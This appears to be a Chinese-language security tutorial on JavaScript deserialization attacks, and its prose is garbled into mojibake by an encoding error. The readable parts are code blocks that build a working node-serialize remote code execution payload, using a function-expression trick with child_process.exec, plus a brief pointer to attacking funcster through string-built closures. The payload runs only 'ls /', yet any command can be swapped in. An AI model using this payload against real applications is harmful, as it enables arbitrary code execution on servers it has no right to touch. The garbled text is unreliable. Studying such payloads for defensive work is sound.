鍙嶅簭鍒楀寲
========================================
绠€浠�
----------------------------------------
JavaScript鏈韩骞舵病鏈夊弽搴忓垪鍖栫殑瀹炵幇锛屼絾鏄竴浜涘簱濡俷ode-serialize銆乻erialize-to-js绛夋敮鎸佷簡鍙嶅簭鍒楀寲鍔熻兘銆傝繖浜涘簱閫氬父浣跨敤JSON褰㈠紡鏉ュ瓨鍌ㄦ暟鎹紝浣嗘槸鍜屽師鐢熷嚱鏁癑SON.parse銆� JSON.stringify涓嶅悓锛岃繖浜涘簱鏀寔浠讳綍瀵硅薄鐨勫弽搴忓垪鍖栵紝鐗瑰埆鏄嚱鏁帮紝濡傛灉浣跨敤涓嶅綋锛屽垯鍙兘浼氬嚭鐜板弽搴忓垪鍖栭棶棰樸€�
Payload鏋勯€�
----------------------------------------
涓嬮潰鏄竴涓渶绠€鍗曠殑渚嬪瓙锛岄鍏堣幏寰楀簭鍒楀寲鍚庣殑杈撳嚭
.. code-block:: javascript
var y = {
rce : function(){
require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });
},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
涓婇潰鎵ц鍚庝細杩斿洖
.. code-block:: javascript
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}"}
涓嶈繃杩欐payload鍙嶅簭鍒楀寲鍚庡苟涓嶄細鎵ц锛屼絾鏄湪JS涓敮鎸佺珛鍗宠皟鐢ㄧ殑鍑芥暟琛ㄨ揪寮忥紙Immediately Invoked Function Expression锛夛紝姣斿 ``(function () { /* code */ } ());`` 杩欐牱灏变細鎵ц鍑芥暟涓殑浠g爜銆傞偅涔堝彲浠ヤ娇鐢ㄨ繖绉嶆柟娉曚慨鏀瑰簭鍒楀寲鍚庣殑瀛楃涓叉潵瀹屾垚涓€娆″弽搴忓垪鍖栥€傛渶鍚庣殑payload娴嬭瘯濡備笅:
.. code-block:: javascript
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);
Payload鏋勯€� II
----------------------------------------
浠ヤ笂鎻愬埌鐨勬槸node-serialize杩欑被鍙嶅簭鍒楀寲搴撶殑鏋勯€犳柟寮忥紝杩樻湁涓€绫诲簱濡俧uncster锛屾槸浣跨敤鐩存帴鎷兼帴瀛楃涓叉瀯閫犲嚱鏁扮殑鏂瑰紡鏉ユ墽琛屻€�
.. code-block:: javascript
return "module.exports=(function(module,exports){return{" + entries + "};})();";
杩欑鏂瑰紡鍙互浣跨敤鐩稿簲鐨勯棴鍚堟潵鏋勯€爌ayload銆�